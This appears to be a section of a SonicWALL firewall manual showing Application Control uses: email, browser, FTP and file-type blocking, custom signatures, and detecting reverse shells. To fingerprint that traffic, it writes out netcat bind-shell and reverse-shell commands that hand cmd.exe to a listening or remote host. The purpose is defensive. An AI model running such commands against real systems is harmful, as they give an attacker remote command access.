A hosted email environment is one in which email is available on a user’s Internet Service Provider (ISP). Typically, POP3 is the protocol used for email transfer in this environment. Many small-business owners use this model, and would like to control email content as well as email attachments. Running Application Control on the gateway provides a solution for controlling POP3-based as well as SMTP-based email.

Application Control can also scan HTTP, which is useful for email hosted by sites such as Yahoo or Hotmail. Note that when an attachment is blocked while using HTTP, Application Control does not provide the file name of the blocked file. You can also use Application Control to control FTP when accessing database servers.

If you want a dedicated SMTP solution, you can use SonicWALL Email Security. Email Security is used by many larger businesses for controlling SMTP-based email, but it does not support POP3. For controlling multiple email protocols, Application Control provides an excellent solution.

Email Control

Application Control can be very effective for certain types of email control, especially when a blanket policy is desired. For example, you can prevent sending attachments of a given type, such as .exe, on a per-user basis, or for an entire domain. Because the file name extension is being matched in this case, changing the extension before sending the attachment will bypass filtering. Note that you can also prevent attachments in this way on your email server if you have one. If not, then Application Control provides the functionality.

You can create a match object that scans for file content matching strings such as “confidential,” “internal use only,” and “proprietary” to implement basic controls over the transfer of proprietary data.

You can also create a policy that prevents email to or from a specific domain or a specific user. You can use Application Control to limit email file size, but not to limit the number of attachments. Application Control can block files based on MIME type. It cannot block encrypted SSL or TLS traffic, nor can it block all encrypted files. To block encrypted email from a site that is using HTTPS, you can create a custom match object that matches the certificate sent before the HTTPS session begins. This is part of the SSL session before it gets encrypted. Then you would create a custom policy that blocks that certificate. See File Formats That Can Be Scanned for Keywords.

Application Control can scan email attachments that are text-based or are compressed to one level, but not encrypted. The following table lists file formats that Application Control can scan for keywords. Other formats should be tested before you use them in a policy.

 

File Formats That Can Be Scanned for Keywords

File Type

Common Extension

C source code

c

C+ source code

cpp

Comma-separated values

csv

HQX archives

hqx

HTML

htm

Lotus 1-2-3

wks

Microsoft Access

mdb

Microsoft Excel

xls

Microsoft PowerPoint

ppt

Microsoft Visio

vsd

Microsoft Visual Basic

vbp

Microsoft Word

doc

Microsoft Works

wps

Portable Document Format

pdf

Rich Text Format

rft

SIT archives

sit

Text files

txt

WordPerfect

wpd

XML

xml

Tar archives (“tarballs”)

tar

ZIP archives

zip, gzip

Web Browser Control

You can also use Application Control to protect your Web servers from undesirable browsers. Application Control supplies match object types for Netscape, MSIE, Firefox, Safari, and Chrome. You can define a match object using one of these types, and reference it in a policy to block that browser.

You can also access browser version information by using an HTTP User Agent match object type. For example, older versions of various browsers can be susceptible to security problems. Using Application Control, you can create a policy that denies access by any problematic browser, such as Internet Explorer. You can also use negative matching to exclude all browsers except the one(s) you want. For example, you might want to allow Internet Explorer version 6 only, due to flaws in version 5, and because you haven’t tested version 7. To do this, you would use a network protocol analyzer such as Wireshark to determine the Web browser identifier for IEv6, which is MSIE 6.0. Then you could create a match object of type HTTP User Agent, with content MSIE 6.0 and enable negative matching.

You can use this match object in a policy to block browsers that are not MSIE 6.0. For information about using Wireshark to find a Web browser identifier, see Wireshark. For information about negative matching, see Negative Matching.

Another example of a use case for controlling Web browser access is a small e-commerce site that is selling discounted goods that are salvaged from an overseas source. If the terms of their agreement with the supplier is that they cannot sell to citizens of the source nation, they could configure Application Control to block access by the in-country versions of the major Web browsers.

Application Control supports a pre-defined selection of well-known browsers, and you can add others as custom match objects. Browser blocking is based on the HTTP User Agent reported by the browser. Your custom match object must contain content specific enough to identify the browser without creating false positives. You can use Wireshark or another network protocol analyzer to obtain a unique signature for the desired browser.

HTTP Post Control

You can enhance the security of public facing read-only HTTP servers by disallowing the HTTP POST method.

To disallow HTTP POST:
1
Use Notepad or another text editor to create a new document called Post.htm that contains this HTML code:

<FORM action="http://www.yahoo.com/" method="post">

<p>Please enter your name: <input type="Text" name="FullName"></p>

<input type="submit" value="Submit"> <INPUT type="reset">

2
Save the file to your desktop or a convenient location.
3
Open the Wireshark network analyzer.
4
Start a capture. For information about using Wireshark, see Wireshark.
5
In a browser, open the Post.htm file you just created.
6
Type in your name.
7
Click Submit.
8
Stop the capture.
9
Using the Wireshark Edit > Find Packet function, search for the string POST.

Wireshark will jump to the first frame that contains the requested data. You should see something like this, which indicates that the HTTP POST method is transmitted immediately after the TCP header information and is comprised of the first four bytes (504f5354) of the TCP payload (HTTP application layer):

You can use that information to create a custom match object that detects the HTTP POST method.

To create a custom match object:
1
Navigate to Firewall > Match Objects.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Create a match object like this one:

* 
NOTE: In this particular match object you would use the Enable Settings feature to create an object that matches a specific part of the payload. The Offset field specifies which byte in the payload to begin matching and helps to minimize false positives by making the match more specific. The Depth field specifies at what byte to stop matching. The Min and Max fields allow you to specify a minimum and maximum payload size.
4
Navigate to Firewall > App Rules.
5
Click Add New Policy. The Edit App Control Policy dialog displays.
6
Create a policy like this one:

7
To test, use a browser to open the Post.htm document you created earlier.
8
Type in your name.
9
Click Submit. The connection should be dropped this time, and you should see an alert in the log similar to this one:

Forbidden File Type Control

You can use Application Control to prevent risky or forbidden file types (for example, exe, vbs, scr, dll, avi, mov) from being uploaded or downloaded.

To control forbidden file types:
1
Navigate to Firewall > Match Objects.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Create an object like this one:

4
Navigate to Firewall > Action Objects.
5
Click Add New Action Object. The Add/Edit Action Object dialog displays.
6
Create an action like this one:

To see a preview of the message to be displayed, click Preview.

7
Click OK.
8
To create a policy that uses this object and action, navigate to Firewall > App Rules.
9
Click Add New Policy. The Edit App Control Policy dialog displays.
10
Create a policy like this one:

11
Click OK.
12
To test this policy, open a Web browser and try to download any of the file types specified in the match object (exe, vbs, scr). Below is a URL that you can try:

http://www.skype.com/en/download-skype/skype-for-computer/

You will see an alert similar to the one shown below.

ActiveX Control

One of the most useful capabilities of Application Control is the ability to distinguish between different types of ActiveX or Flash network traffic. This allows you to block games while permitting Windows updates. Prior to Application Control, you could configure SonicOS to block ActiveX with Security Services > Content Filter, but this blocked all ActiveX controls, including your software updates.

Application Control achieves this distinction by scanning for the value of classid in the HTML source. Each type of ActiveX has its own class ID, and the class ID can change for different versions of the same application.

Some ActiveX types and their classids are shown in ActiveX Types and Classids.

 

ActiveX Types and Classids

ActiveX Type

Classid

Apple Quicktime

02BF25D5-8C17-4B23-BC80-D3488ABDDC6B

Adobe Flash v6, v7

D27CDB6E-AE6D-11cf-96B8-444553540000

Adobe Shockwave

D27CDB6E-AE6D-11cf-96B8-444553540000

Microsoft Windows Media Player v6.4

22d6f312-b0f6-11d0-94ab-0080c74c7e95

Microsoft Windows Media Player v7-10

6BF52A52-394A-11d3-B153-00C04F79FAA6

Real Networks Real Player

CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA

Sun Java Web Start

5852F5ED-8BF4-11D4-A245-0080C6F74284

Example of ActiveX-Type Match Object shows an ActiveX-type match object that is using the Adobe Shockwave class ID. You can create a policy that uses this match object to block online games or other Adobe Shockwave-based content.

Example of ActiveX-Type Match Object

You can look up the class ID for these Active X controls on the Internet, or you can view the source in your browser to find it. For example, Example Source File for Shockwave or Flash shows a source file with the class ID for Adobe Shockwave or Flash.

Example Source File for Shockwave or Flash

FTP Control

Application Control provides control over the FTP control channel and FTP uploads and downloads with the FTP Command and File Content match object types. Using these, you can regulate FTP usage very effectively. The following two use cases are described in this section:

Blocking Outbound Proprietary Files Over FTP

Blocking outbound files over FTP is best done through a policy based on keywords or patterns inside the files.

To block outbound file transfers of proprietary files over FTP.
1
Navigate to Firewall > Match Object.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Create a match object of type File Content that matches on keywords in files:

4
Click OK.
5
Optionally, you can create a customized FTP notification action that sends a message to the client.
a
Navigate to Firewall > Action Objects.
b
Click Add New Action Object. The Add/Edit Action Object dialog displays.
c
Create the Action Object with the message to be displayed.

d
Click OK.
6
Navigate to Firewall > App Rules.
7
Click Add New Policy. The Edit App Control Policy dialog displays.
8
Create a policy that references this match object and action:

If you prefer to simply block the file transfer and reset the connection, you can select the Reset/Drop action when you create the policy.

9
Click OK.

Blocking Outbound UTF-8/UTF-16 Encoded Files

Native Unicode UTF-8 and UTF-16 support by Application Control allows encoded multi-byte characters, such as Chinese or Japanese characters, to be entered as match object content keywords using the alphanumeric input type. Application Control supports keyword matching of UTF-8 encoded content typically found in Web pages and email applications, and UTF-16 encoded content typically found in Windows OS/Microsoft Office based documents.

Blocking outbound file transfers of proprietary Unicode files over FTP is handled in the same way as blocking other confidential file transfers.

To create a policy that blocks outbound UTF-8/UTF-16 encoded files:
1
Navigate to Firewall > Match Object.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Create a match object that matches on UTF-8 or UTF-16 encoded keywords in files.

For example, a match object type of File Content with a UTF-16 encoded Chinese keyword that translates as “confidential document.”

4
Click OK.
5
Navigate to Firewall > App Rules.
6
Click Add New Policy. The Edit App Control Policy dialog displays.
7
Create a policy that references the match object and blocks transfer of matching files, blocks the file transfer, and resets the connection. Select Enable Logging so any attempt to transfer a file containing the UTF-16 encoded keyword is logged.

8
Click OK.

A log entry is generated after a connection Reset/Drop, including the Message stating that it is an Application Control Alert, displaying the Policy name and the Action Type of Reset/Drop; for example:

Blocking FTP Commands

You can use Application Control to ensure that your FTP server is read-only by blocking commands such as put, mput, rename_to, rename_from, rmdir, and mkdir.

The following procedure shows how to create match object containing only the put command, but you could include all of the FTP commands in the same match object.

To block FTP commands:
1
Navigate to Firewall > Match Object.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Create a match object that matches on the put command:

* 
TIP: Select the FTP command from the Command drop-down menu.
* 
TIP: Because the mput command is a variation of the put command, a match object that matches the put command also matches the mput command.
4
Click OK.
5
Optionally, you can create a customized FTP notification action that sends a message to the client.
a
Navigate to Firewall > Action Objects.
b
Click Add New Action Object. The Add/Edit Action Object dialog displays.
c
Create the Action Object with the message to be displayed.

d
Click OK.
6
Navigate to Firewall > App Rules.
7
Click Add New Policy. The Edit App Control Policy dialog displays.
8
Create a policy that references this match object and action. If you prefer to simply block the put command and reset the connection, you can select the Reset/Drop action when you create the policy.

9
Click OK.

Bandwidth Management

You can use application-layer bandwidth management to control the amount of network bandwidth that can be used to transfer certain file types. This allows you to discourage non-productive traffic and encourage productive traffic on your network.

For example, you can limit the bandwidth used to download MP3 files over FTP to no more than 400 kilobits per second (kbps). Whether one user or 100 users are downloading MP3 files, this policy limits their aggregate bandwidth to 400 kbps.

For information on configuring bandwidth management, see Bandwidth Management Overview

Bypass DPI

You can use the Bypass DPI action to increase performance over the network if you know that the content being accessed is safe. For example, this might be the case if your company has a corporate video that you want to stream to company employees over HTTP by having them access a URL on a Web server. As you know that the content is safe, you can create an Application Control policy that applies the Bypass DPI action to every access of this video. This ensures the fastest streaming speeds and the best viewing quality for employees accessing the video.

To bypass DPI:
1
Navigate to Firewall > Match Object.
2
Click Add New Match Object. The Add/Edit Match Object dialog displays.
3
Define a match object for the corporate video using a match object type of HTTP URI Content:

* 
TIP: The leading slash (/) of the URL should always be included for Exact Match and Prefix Match types for URI Content match objects. You do not need to include the host header, such as www.company.com, in the Content field.
4
Click OK.
5
Navigate to Firewall > App Rules.
6
Click Add New Policy. The Edit App Control Policy dialog displays.
7
Create a policy that uses the Corporate Video match object and also uses the Bypass DPI action:

8
Click OK.

Custom Signature

You can create a custom match object that matches any part of a packet if you want to control traffic that does not have a predefined object type in Application Control. This allows you to create a custom signature for any network protocol.

For instance, you can create a custom signature to match HTTP GET request packets. You might use this if you want to prevent Web browsing from your local area network.

To determine a unique identifier for a HTTP GET packet, you can use the Wireshark network protocol analyzer to view the packet header. For more information about using Wireshark, see Wireshark. In Wireshark, capture some packets that include the traffic you are interested in. In this case, you want to capture a HTTP GET request packet. You can use any web browser to generate the HTTP GET request.

To create a custom policy for a custom signature:
1
Access Wireshark in any web browser.
2
In Wireshark, generate the HTTP GET request.
3
Wireshark displays the HTTP GET request packet:

4
In the top pane of Wireshark, scroll down to find the HTTP GET packet.
5
Click on that line.

The packet is displayed in the two lower panes. For a SYN packet, the center pane provides a human-readable interpretation of the packet header, and the actual header bytes are displayed in hexadecimal in the lower pane.

6
In the center pane, expand the Hypertext Transfer Protocol section to see the packet payload.
7
Click on the identifier you want to reference in Application Control. In this case, the identifier is the GET command in the first three bytes. Click on this to highlight the corresponding bytes in the lower pane.
8
You can determine the offset and the depth of the highlighted bytes in the lower pane. Offset and depth are terms used by Application Control. Offset indicates which byte in the packet to start matching against, and depth indicates the last byte to match. Using an offset allows very specific matching and minimizes false positives.
* 
NOTE: When you calculate offset and depth, the first byte in the packet is counted as number one (not zero). Decimal numbers are used rather than hexadecimal to calculate offset and depth. Offset and depth associated with a custom match object are calculated starting from the packet payload (the beginning of the TCP or UDP payload). In this case, the offset is 1 and the depth is 3.
9
Navigate to Firewall > Match Object.
10
Click Add New Match Object. The Add/Edit Match Object dialog displays.
11
Create a custom match object that uses this information.

a
Enter a descriptive name for the object in the Object Name field.
b
Select Custom Object from the Match Object Type drop-down menu. Select Exact Match from the Match Type drop-down menu.
c
Select the Enable Settings check box. The settings fields become available.
d
In the Offset field, type 1 (the starting byte of the identifier).
e
In the Depth field, type 3 (the last byte of the identifier).
* 
TIP: You can leave the Payload Size set to the default value. The Payload Size is used to indicate the amount of data in the packet, but in this case we are only concerned with the packet header.
f
For Input Representation, select Hexadecimal.
g
In the Content field, type the bytes as shown by Wireshark: 474554. Do not use spaces in hexadecimal content.
12
Click OK.
13
Navigate to Firewall > App Rules.
14
Click Add New Policy. The Edit App Control Policy dialog displays.
15
Create a policy that uses the HTTP GET match object:

16
Enter a descriptive name for the policy in the Policy Name field.
17
Select HTTP Client for the policy type from the Policy Type drop-down menu.
18
From the Match Object drop-down menu, select the match object that you just defined, HTTP GET.
19
Select a custom action or a default action such as Reset/Drop.
20
For the Connection Side, select Client Side. You can also modify other settings. For more information about creating a policy, see Prerequisites to Configuring App Rules Policies.
21
Click OK.

Reverse Shell Exploit Prevention

The reverse shell exploit is an attack that you can prevent by using Application Control’s custom signature capability (See Custom Signature). A reverse shell exploit could be used by an attacker who successfully in gained access to your system by means of a Zero-day exploit. A Zero-day exploit refers to an attack whose signature is not yet recognized by security software.

In an early stage while still unknown, malicious payloads can pass through the first line of defense, which is the IPS and Gateway Anti-Virus (GAV) running at the Internet gateway and even the second line of defense represented by the host-based Anti-Virus software, allowing arbitrary code execution on the target system.

In many cases, the executed code contains the minimal amount of instructions needed for the attacker to remotely obtain a command prompt window (with the privileges of the exploited service or logged on user) and proceed with the penetration from there.

As a common means to circumvent NAT/firewall issues, which might prevent their ability to actively connect to an exploited system, attackers make the vulnerable system execute a reverse shell. In a reverse shell, the connection is initiated by the target host to the attacker address, using well-known TCP/UDP ports for better avoidance of strict outbound policies.

This use case is applicable to environments hosting Windows systems and will intercept unencrypted connections over all TCP/UDP ports.

* 
NOTE: Networks using unencrypted Telnet service must configure policies that exclude those servers’ IP addresses.

While this use case refers to the specific case of reverse shell payloads (outbound connections), it is more secure to configure the policy to be effective also for inbound connections. This protects against a case where the executed payload spawns a listening shell onto the vulnerable host and the attacker connects to that service across misconfigured firewalls.

The actual configuration requires the following:

Generating the actual network activity to be fingerprinted, using the netcat tool
Capturing the activity and exporting the payload to a text file, using the Wireshark tool
Creating a match object with a string that is reasonably specific and unique enough to avoid false positives
Defining a policy with the action to take when a payload containing the object is parsed (the default Reset/Drop is used here)
Topics:

Generating the Network Activity

The netcat tool offers, among other features, the ability to bind a program’s output to an outbound or a listening connection. The following usage examples show how to setup a listening “Command Prompt Daemon” or how to connect to a remote endpoint and provide an interactive command prompt:

nc –l –p 23 –e cmd.exe

A Windows prompt will be available to hosts connecting to port 23 (the -l option stands for listen mode as opposed to the default, implicit, connect mode).

nc –e cmd.exe 44.44.44.44 23

A Windows prompt will be available to host 44.44.44.44 if host 44.44.44.44 is listening on port 23 using the netcat command:

nc -l -p 23

Capturing and Exporting the Payload to a Text File, Using Wireshark

To capture the data, launch Wireshark and click Capture > Interfaces to open a capture dialog. Start a capture on the interface with the netcat traffic. As soon as the capture begins, run the netcat command and then stop the capture.

Data Flow shows the data flow through the network during such a connection (Vista Enterprise, June 2007):

Data Flow

The hexadecimal data can be exported to a text file for trimming off the packet header, unneeded or variable parts and spaces. The relevant portion here is Microsoft… reserved. You can use the Wireshark hexadecimal payload export capability for this. For information about Wireshark, see Wireshark.

Creating a Match Object

The following hexadecimal characters are entered as the object content of the match object representing the Vista command prompt banner:

4D6963726F736F66742057696E646F7773205B56657273696F6E20362E302E363030305D0D0A436F70797269676874202863292032303036204D6963726F73667420436F72706F726174696F6E2E
* 
NOTE: Fingerprint export and the match object definition do not really need to use hexadecimal notation here (the actual signature is ASCII text in this case). Hexadecimal is only required for binary signatures.

Similar entries are obtained in the same manner from Windows 2000 and Windows XP hosts and used to create other match objects, resulting in the three match objects shown below:

Other examples for Windows Server 2003 or any other Windows version may be easily obtained using the described method.

Linux/Unix administrators need to customize the default environment variable to take advantage of this signature-based defense, as the default prompt is typically not sufficiently specific or unique to be used as described above.

Defining the Policy

After creating the match objects, you can define a policy that uses them. The image below shows the other policy settings. This example, as shown in Reverse Shell App Control Policy, is specific for reverse shells in both the Policy Name and the Direction settings. As mentioned, it may also be tailored for a wider scope with the Direction setting changed to Both and a more generic name.

Reverse Shell App Control Policy

A log entry with a Category of Network Access is generated after a connection Reset/Drop. The screenshot below shows the log entry, including the message stating that it is an Application Control Alert and displaying the policy name:

As experience suggests, appropriate security measures would include several layers of intelligence and no single approach can be considered a definitive defense against hostile code.